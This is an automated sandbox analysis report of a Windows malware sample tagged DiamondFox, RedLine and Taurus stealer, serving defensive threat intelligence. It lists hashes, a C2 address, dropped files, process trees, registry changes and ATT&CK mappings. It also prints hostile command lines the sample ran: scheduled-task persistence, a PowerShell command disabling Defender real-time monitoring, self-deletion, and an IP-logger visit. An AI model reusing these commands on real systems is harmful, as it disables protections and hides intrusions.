diamondfox | 2f76ea148491b558111e852ce708f8802896c21c3b18239d14078f313822e301

Analysis

max time kernel
149s
max time network
142s
platform
windows7_x64
resource
win7v20210408
submitted
07-06-2021 06:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

33815ECF51B4A2F18811FBA9ED999D36.exe
Size

2.5MB
MD5

33815ecf51b4a2f18811fba9ed999d36
SHA1

709cde4326af52f644cf00d260af65bdd0cbf5e1
SHA256

2f76ea148491b558111e852ce708f8802896c21c3b18239d14078f313822e301
SHA512

d3e1669d4e60d180a9bcd6b87f2c376be69bb7bebf6a73f0503ab65e4770354b71adcfc0688444ccf9a4d57fff32542f29bbcf12bc9686f347fa8ae8eaac82f5

Score

10^/10

diamondfox redline taurus 002 botnet discovery infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

redline

Botnet

002

piporopopo.com:54367

Signatures

DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
botnet stealer diamondfox
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/432-165-0x0000000000620000-0x0000000000639000-memory.dmp	family_redline
behavioral1/memory/432-169-0x0000000000770000-0x0000000000787000-memory.dmp	family_redline

Taurus Stealer
Taurus is an infostealer first seen in June 2020.
trojan stealer taurus

Taurus Stealer Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/420-161-0x0000000000400000-0x0000000000646000-memory.dmp	family_taurus_stealer

DiamondFox payload 2 IoCs

Detects DiamondFox payload in file/memory.

Processes:

resource	yara_rule
behavioral1/memory/664-140-0x0000000000400000-0x0000000000641000-memory.dmp	diamondfox
behavioral1/memory/2396-180-0x0000000000400000-0x0000000000641000-memory.dmp	diamondfox

Executes dropped EXE 15 IoCs

Processes:

Control.dllcurl.dllautorun.dllautorun.exesistemes.dllsistemes.exelaun.dlllaun.exeder.dllder.exeTausuus.dllTausuus.exered.dllred.exeMicrosoftEdgeCPS.exe

pid	process
1208	Control.dll
1356	curl.dll
1628	autorun.dll
268	autorun.exe
552	sistemes.dll
324	sistemes.exe
1568	laun.dll
1072	laun.exe
1792	der.dll
664	der.exe
688	Tausuus.dll
420	Tausuus.exe
1556	red.dll
432	red.exe
2396	MicrosoftEdgeCPS.exe

Loads dropped DLL 34 IoCs

Processes:

33815ECF51B4A2F18811FBA9ED999D36.exeautorun.dllsistemes.dlllaun.dllder.dllTausuus.dllred.dllder.exe

pid	process
344	33815ECF51B4A2F18811FBA9ED999D36.exe
344	33815ECF51B4A2F18811FBA9ED999D36.exe
344	33815ECF51B4A2F18811FBA9ED999D36.exe
1628	autorun.dll
1628	autorun.dll
1628	autorun.dll
1628	autorun.dll
344	33815ECF51B4A2F18811FBA9ED999D36.exe
552	sistemes.dll
552	sistemes.dll
552	sistemes.dll
552	sistemes.dll
344	33815ECF51B4A2F18811FBA9ED999D36.exe
1568	laun.dll
1568	laun.dll
1568	laun.dll
1568	laun.dll
344	33815ECF51B4A2F18811FBA9ED999D36.exe
1792	der.dll
1792	der.dll
1792	der.dll
1792	der.dll
344	33815ECF51B4A2F18811FBA9ED999D36.exe
688	Tausuus.dll
688	Tausuus.dll
688	Tausuus.dll
688	Tausuus.dll
344	33815ECF51B4A2F18811FBA9ED999D36.exe
1556	red.dll
1556	red.dll
1556	red.dll
1556	red.dll
664	der.exe
664	der.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Explorer.EXE

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Time Manager = "C:\\ProgramData\\TimeManager.exe"	Explorer.EXE

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Explorer.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Explorer.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Explorer.EXE

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

1968 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

2876 timeout.exe

pid	process
1968	schtasks.exe

pid	process
2876	timeout.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e45000000000020000000000106600000001000020000000ba378fb6f70ef2ce72e99dd98bd57808bf8f38a4813fcf1a0813a0ca5bfc1141000000000e8000000002000020000000a881b85eb577f45d751558c99b356ba09911647740cc8b029ecf96146cf8561220000000c6ab515d7475ce3e6ba824f22137f88a2b388fd9667a64a9f802024edd3f00c240000000917b14c9f35cddbb4485b4cd91b7537363d99f87f346ba4764cb5010bbf34d64ea0d5bba5255136fb94eba633b43466c3e2ac20611bdc8cc42e44ffa1fa0e962	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "329820314"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000529101d5c9814b4eb0f580b37542e45000000000020000000000106600000001000020000000a10bb20e0f51bd1e9aa81f75602f55c08d1055d22abb182c6034dfa79d53df77000000000e8000000002000020000000a43d9e38e521bb25105bd2a932ca185070b841d86cd099ac4744aad301b3f0eb90000000c83e4996d72dea514f92c5a7352f2e25efebd3132f8c64b041c017a169d740058e930dcc1e9d89371733c22504ec30cd11890c9a430c967ea0af245f414c7540a32b10d09d07f794cfd12255954c39eb6e573dc40f032cdb0e1d917571902205b97e5690ee0e6591dc905f01bbf94caa10564657e8b5d174f9351cfb418b5c43153d87cccf3d6be1a48c88c04c8264034000000073cc70f2bb00cfaa4b7142e259b9c78da91acd046ff1720f7bb935744131270fc6a08e975971ab036183894edc406a53e4d2081b6bbd709fc0384022c785ff6a	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 00a7f221795bd701	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{447AD191-C76C-11EB-9C3B-E20B45539B95} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-2455352368-1077083310-2879168483-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

laun.exepowershell.exered.exe

pid process

1072 laun.exe
2428 powershell.exe
2428 powershell.exe
432 red.exe
432 red.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

iexplore.exe

pid process

840 iexplore.exe

pid	process
1072	laun.exe
2428	powershell.exe
2428	powershell.exe
432	red.exe
432	red.exe

pid	process
840	iexplore.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

laun.exeExplorer.EXEpowershell.exered.exe

description	pid	process
Token: SeDebugPrivilege	1072	laun.exe
Token: SeShutdownPrivilege	1180	Explorer.EXE
Token: SeShutdownPrivilege	1180	Explorer.EXE
Token: SeShutdownPrivilege	1180	Explorer.EXE
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	432	red.exe

Suspicious use of FindShellTrayWindow 5 IoCs

Processes:

iexplore.exeExplorer.EXE

pid process

840 iexplore.exe
1180 Explorer.EXE
1180 Explorer.EXE
1180 Explorer.EXE
1180 Explorer.EXE
Suspicious use of SendNotifyMessage 4 IoCs

Processes:

Explorer.EXE

pid process

1180 Explorer.EXE
1180 Explorer.EXE
1180 Explorer.EXE
1180 Explorer.EXE
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

iexplore.exeIEXPLORE.EXE

pid process

840 iexplore.exe
840 iexplore.exe
1448 IEXPLORE.EXE
1448 IEXPLORE.EXE
1448 IEXPLORE.EXE
1448 IEXPLORE.EXE
Suspicious use of UnmapMainImage 7 IoCs

Processes:

autorun.exesistemes.exelaun.exeder.exeTausuus.exered.exeMicrosoftEdgeCPS.exe

pid process

268 autorun.exe
324 sistemes.exe
1072 laun.exe
664 der.exe
420 Tausuus.exe
432 red.exe
2396 MicrosoftEdgeCPS.exe

pid	process
840	iexplore.exe
1180	Explorer.EXE
1180	Explorer.EXE
1180	Explorer.EXE
1180	Explorer.EXE

pid	process
1180	Explorer.EXE
1180	Explorer.EXE
1180	Explorer.EXE
1180	Explorer.EXE

pid	process
840	iexplore.exe
840	iexplore.exe
1448	IEXPLORE.EXE
1448	IEXPLORE.EXE
1448	IEXPLORE.EXE
1448	IEXPLORE.EXE

pid	process
268	autorun.exe
324	sistemes.exe
1072	laun.exe
664	der.exe
420	Tausuus.exe
432	red.exe
2396	MicrosoftEdgeCPS.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

33815ECF51B4A2F18811FBA9ED999D36.exeiexplore.exeautorun.dllsistemes.dllsistemes.exelaun.dlllaun.exeder.dll

description	pid	process	target process
PID 344 wrote to memory of 840	344	33815ECF51B4A2F18811FBA9ED999D36.exe	iexplore.exe
PID 344 wrote to memory of 840	344	33815ECF51B4A2F18811FBA9ED999D36.exe	iexplore.exe
PID 344 wrote to memory of 840	344	33815ECF51B4A2F18811FBA9ED999D36.exe	iexplore.exe
PID 344 wrote to memory of 840	344	33815ECF51B4A2F18811FBA9ED999D36.exe	iexplore.exe
PID 344 wrote to memory of 1208	344	33815ECF51B4A2F18811FBA9ED999D36.exe	Control.dll
PID 344 wrote to memory of 1208	344	33815ECF51B4A2F18811FBA9ED999D36.exe	Control.dll
PID 344 wrote to memory of 1208	344	33815ECF51B4A2F18811FBA9ED999D36.exe	Control.dll
PID 344 wrote to memory of 1208	344	33815ECF51B4A2F18811FBA9ED999D36.exe	Control.dll
PID 840 wrote to memory of 1448	840	iexplore.exe	IEXPLORE.EXE
PID 840 wrote to memory of 1448	840	iexplore.exe	IEXPLORE.EXE
PID 840 wrote to memory of 1448	840	iexplore.exe	IEXPLORE.EXE
PID 840 wrote to memory of 1448	840	iexplore.exe	IEXPLORE.EXE
PID 344 wrote to memory of 1356	344	33815ECF51B4A2F18811FBA9ED999D36.exe	curl.dll
PID 344 wrote to memory of 1356	344	33815ECF51B4A2F18811FBA9ED999D36.exe	curl.dll
PID 344 wrote to memory of 1356	344	33815ECF51B4A2F18811FBA9ED999D36.exe	curl.dll
PID 344 wrote to memory of 1356	344	33815ECF51B4A2F18811FBA9ED999D36.exe	curl.dll
PID 344 wrote to memory of 1628	344	33815ECF51B4A2F18811FBA9ED999D36.exe	autorun.dll
PID 344 wrote to memory of 1628	344	33815ECF51B4A2F18811FBA9ED999D36.exe	autorun.dll
PID 344 wrote to memory of 1628	344	33815ECF51B4A2F18811FBA9ED999D36.exe	autorun.dll
PID 344 wrote to memory of 1628	344	33815ECF51B4A2F18811FBA9ED999D36.exe	autorun.dll
PID 1628 wrote to memory of 268	1628	autorun.dll	autorun.exe
PID 1628 wrote to memory of 268	1628	autorun.dll	autorun.exe
PID 1628 wrote to memory of 268	1628	autorun.dll	autorun.exe
PID 1628 wrote to memory of 268	1628	autorun.dll	autorun.exe
PID 1628 wrote to memory of 268	1628	autorun.dll	autorun.exe
PID 1628 wrote to memory of 268	1628	autorun.dll	autorun.exe
PID 1628 wrote to memory of 268	1628	autorun.dll	autorun.exe
PID 344 wrote to memory of 552	344	33815ECF51B4A2F18811FBA9ED999D36.exe	sistemes.dll
PID 344 wrote to memory of 552	344	33815ECF51B4A2F18811FBA9ED999D36.exe	sistemes.dll
PID 344 wrote to memory of 552	344	33815ECF51B4A2F18811FBA9ED999D36.exe	sistemes.dll
PID 344 wrote to memory of 552	344	33815ECF51B4A2F18811FBA9ED999D36.exe	sistemes.dll
PID 552 wrote to memory of 324	552	sistemes.dll	sistemes.exe
PID 552 wrote to memory of 324	552	sistemes.dll	sistemes.exe
PID 552 wrote to memory of 324	552	sistemes.dll	sistemes.exe
PID 552 wrote to memory of 324	552	sistemes.dll	sistemes.exe
PID 344 wrote to memory of 1568	344	33815ECF51B4A2F18811FBA9ED999D36.exe	laun.dll
PID 344 wrote to memory of 1568	344	33815ECF51B4A2F18811FBA9ED999D36.exe	laun.dll
PID 344 wrote to memory of 1568	344	33815ECF51B4A2F18811FBA9ED999D36.exe	laun.dll
PID 344 wrote to memory of 1568	344	33815ECF51B4A2F18811FBA9ED999D36.exe	laun.dll
PID 324 wrote to memory of 1968	324	sistemes.exe	schtasks.exe
PID 324 wrote to memory of 1968	324	sistemes.exe	schtasks.exe
PID 324 wrote to memory of 1968	324	sistemes.exe	schtasks.exe
PID 324 wrote to memory of 1968	324	sistemes.exe	schtasks.exe
PID 1568 wrote to memory of 1072	1568	laun.dll	laun.exe
PID 1568 wrote to memory of 1072	1568	laun.dll	laun.exe
PID 1568 wrote to memory of 1072	1568	laun.dll	laun.exe
PID 1568 wrote to memory of 1072	1568	laun.dll	laun.exe
PID 1072 wrote to memory of 1180	1072	laun.exe	Explorer.EXE
PID 1072 wrote to memory of 1180	1072	laun.exe	Explorer.EXE
PID 1072 wrote to memory of 1180	1072	laun.exe	Explorer.EXE
PID 1072 wrote to memory of 1180	1072	laun.exe	Explorer.EXE
PID 1072 wrote to memory of 1180	1072	laun.exe	Explorer.EXE
PID 1072 wrote to memory of 1180	1072	laun.exe	Explorer.EXE
PID 1072 wrote to memory of 1180	1072	laun.exe	Explorer.EXE
PID 1072 wrote to memory of 1180	1072	laun.exe	Explorer.EXE
PID 1072 wrote to memory of 1180	1072	laun.exe	Explorer.EXE
PID 1072 wrote to memory of 1180	1072	laun.exe	Explorer.EXE
PID 1072 wrote to memory of 1180	1072	laun.exe	Explorer.EXE
PID 344 wrote to memory of 1792	344	33815ECF51B4A2F18811FBA9ED999D36.exe	der.dll
PID 344 wrote to memory of 1792	344	33815ECF51B4A2F18811FBA9ED999D36.exe	der.dll
PID 344 wrote to memory of 1792	344	33815ECF51B4A2F18811FBA9ED999D36.exe	der.dll
PID 344 wrote to memory of 1792	344	33815ECF51B4A2F18811FBA9ED999D36.exe	der.dll
PID 1792 wrote to memory of 664	1792	der.dll	der.exe
PID 1792 wrote to memory of 664	1792	der.dll	der.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Adds Run key to start application
- Checks processor information in registry
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1180

C:\Users\Admin\AppData\Local\Temp\33815ECF51B4A2F18811FBA9ED999D36.exe
"C:\Users\Admin\AppData\Local\Temp\33815ECF51B4A2F18811FBA9ED999D36.exe"
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:344

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://iplogger.com/2E9wY5
3⤵
- Modifies Internet Explorer settings
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:840

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:840 CREDAT:275457 /prefetch:2
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1448

C:\Users\Admin\AppData\Roaming\Control.dll
"C:\Users\Admin\AppData\Roaming\Control.dll" -s -psfgvedfsbetdfhgbefsdtgretgdhdgersfhbetfsgrsfhasgsdg
3⤵
- Executes dropped EXE
PID:1208

C:\Users\Admin\AppData\Roaming\curl.dll
"C:\Users\Admin\AppData\Roaming\curl.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
3⤵
- Executes dropped EXE
PID:1356

C:\Users\Admin\AppData\Roaming\autorun.dll
"C:\Users\Admin\AppData\Roaming\autorun.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1628

C:\Users\Admin\AppData\Roaming\autorun.exe
"C:\Users\Admin\AppData\Roaming\autorun.exe"
4⤵
- Executes dropped EXE
- Suspicious use of UnmapMainImage
PID:268

C:\Users\Admin\AppData\Roaming\sistemes.dll
"C:\Users\Admin\AppData\Roaming\sistemes.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:552

C:\Users\Admin\AppData\Roaming\sistemes.exe
"C:\Users\Admin\AppData\Roaming\sistemes.exe"
4⤵
- Executes dropped EXE
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:324

C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn Windows\MicrosoftVisualStudio /tr "C:\ProgramData\Microsoft Visual Studio\getmac.exe" /st 00:00 /sc once /du 9999:59 /ri 1 /f
5⤵
- Creates scheduled task(s)
PID:1968

C:\Users\Admin\AppData\Roaming\laun.dll
"C:\Users\Admin\AppData\Roaming\laun.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1568

C:\Users\Admin\AppData\Roaming\laun.exe
"C:\Users\Admin\AppData\Roaming\laun.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:1072

C:\Users\Admin\AppData\Roaming\der.dll
"C:\Users\Admin\AppData\Roaming\der.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1792

C:\Users\Admin\AppData\Roaming\der.exe
"C:\Users\Admin\AppData\Roaming\der.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of UnmapMainImage
PID:664

C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"
5⤵
- Executes dropped EXE
- Suspicious use of UnmapMainImage
PID:2396

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 1
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2428

C:\Users\Admin\AppData\Roaming\Tausuus.dll
"C:\Users\Admin\AppData\Roaming\Tausuus.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:688

C:\Users\Admin\AppData\Roaming\Tausuus.exe
"C:\Users\Admin\AppData\Roaming\Tausuus.exe"
4⤵
- Executes dropped EXE
- Suspicious use of UnmapMainImage
PID:420

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\Tausuus.exe
5⤵
PID:2844

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
6⤵
- Delays execution with timeout.exe
PID:2876

C:\Users\Admin\AppData\Roaming\red.dll
"C:\Users\Admin\AppData\Roaming\red.dll" -s -pfhnrstya4rfhjnterast24wrhetfygr
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1556

C:\Users\Admin\AppData\Roaming\red.exe
"C:\Users\Admin\AppData\Roaming\red.exe"
4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:432

C:\Windows\system32\taskeng.exe
taskeng.exe {2A3601AD-2465-45DA-AE0F-AF0BEC2E235C} S-1-5-21-2455352368-1077083310-2879168483-1000:QWOCTUPM\Admin:Interactive:[1]
1⤵
PID:2972

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
MD5
cc2b94d9643358435b6581b99e48c5e1

SHA1
da011fa71c8caa9f221c986a5e51430bda2bb49d

SHA256
acabd46ac98afdcd638a83f7d2f144bae44c8c1f8999a5841dde9ea0f021e45e

SHA512
1fa1c0b932adbeb63cabe5622a0183ce5b72c93311f3529ca7cfd43436ff65872fe118693e6968b89dd91a8e75ae35522d657fc7fa2dc99db148ec27db8a932d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\bq3gxmw\imagestore.dat
MD5
51d28b2c0763f36209506487a2a6b9ee

SHA1
2f6f24970eb546457f0bd391411251ddca0b3401

SHA256
138f257165d665a7246616bef7d3999093d672e73d6e36addf481e10fb65fe82

SHA512
c0f00b413fa1cf7215cb04e83cf6664192b36d5c900e90aaec5fb4f0b4efc726ca148db7e560f5edca28057175098e85c55cdf9360612be3a0b54e1dcf64403b

Download Submit
C:\Users\Admin\AppData\Roaming\Control.dll
MD5
c335d5a0017bfcbdcfa5a0f864351081

SHA1
774607298d15bd1cbfb17e607567fd2c02572615

SHA256
b023682af434ef733decd131570a83384f43792ad327815b7445132f59438577

SHA512
f1cffb3bef22d15b6f387179fc51c8376589cf37b289b3423dd0d4cd50a4ce9686d8f578a75e170bb5676735104d73817905b03020762ac99b548673c9e43d9b

Download Submit
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe
MD5
7d17f55dcad4fd9b8260a1477d1c5737

SHA1
623e87d0197dd0a3833b4949f01ef6e64364ceb7

SHA256
2de55e087886d1f809d688e8d37ce081e7624150f725b800dc40735c425dd316

SHA512
57e4bab443cb29e862046b3fa9e64dd95c9f0feba9a6ad58342e384a7a61824ff4088736fa55fedd5cef1175aa1c1bf8e15229f58b5b54ce58af70b68c8ed5cc

Download Submit
C:\Users\Admin\AppData\Roaming\Tausuus.dll
MD5
4928f41ec8e25b801d5fd3085f356811

SHA1
3f1a6074412172643e568de1494a9d729842a7ce

SHA256
a1e852ebf665af957c8fc0691520fb1a5da54183cd826e162f8d9a69122ff46d

SHA512
8fd9bdac4b1739c0daeb7353255e5df78842e770b3adbb16fe4e6c26058b5b543a914f2fb49427836bb827b8a00e60cd4331e3b94ac98d6b5b9ef41d0a85db6e

Download Submit
C:\Users\Admin\AppData\Roaming\Tausuus.dll
MD5
4928f41ec8e25b801d5fd3085f356811

SHA1
3f1a6074412172643e568de1494a9d729842a7ce

SHA256
a1e852ebf665af957c8fc0691520fb1a5da54183cd826e162f8d9a69122ff46d

SHA512
8fd9bdac4b1739c0daeb7353255e5df78842e770b3adbb16fe4e6c26058b5b543a914f2fb49427836bb827b8a00e60cd4331e3b94ac98d6b5b9ef41d0a85db6e

Download Submit
C:\Users\Admin\AppData\Roaming\Tausuus.exe
MD5
9e391cff6b4f9f2196bd24ddf85b1bd9

SHA1
68d02e75d870b2bb31c66bb804ad71e2decdcbdc

SHA256
abcac4eef0ce9e5bf5a0834b4238944b54180c8a2ac76b77368b7e308a91cb8a

SHA512
